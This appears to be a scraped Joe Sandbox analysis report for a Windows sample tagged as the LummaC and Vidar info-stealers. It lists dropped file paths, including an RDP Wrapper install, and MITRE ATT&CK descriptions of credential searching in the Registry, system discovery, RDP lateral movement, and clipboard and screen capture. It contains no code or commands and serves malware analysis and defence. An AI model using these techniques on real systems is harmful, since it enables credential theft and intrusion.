Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

C:\Program Files\RDP Wrapper\rdpwrap.ini

C:\ProgramData\BAFIEGIECGCB\BAFIEG

C:\ProgramData\BGDGHJEHJJ.exe

C:\ProgramData\BKJKEBGDHD.exe

C:\ProgramData\ECBGHCGCBKFI\AAEBAF

C:\ProgramData\ECBGHCGCBKFI\BKECFI

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre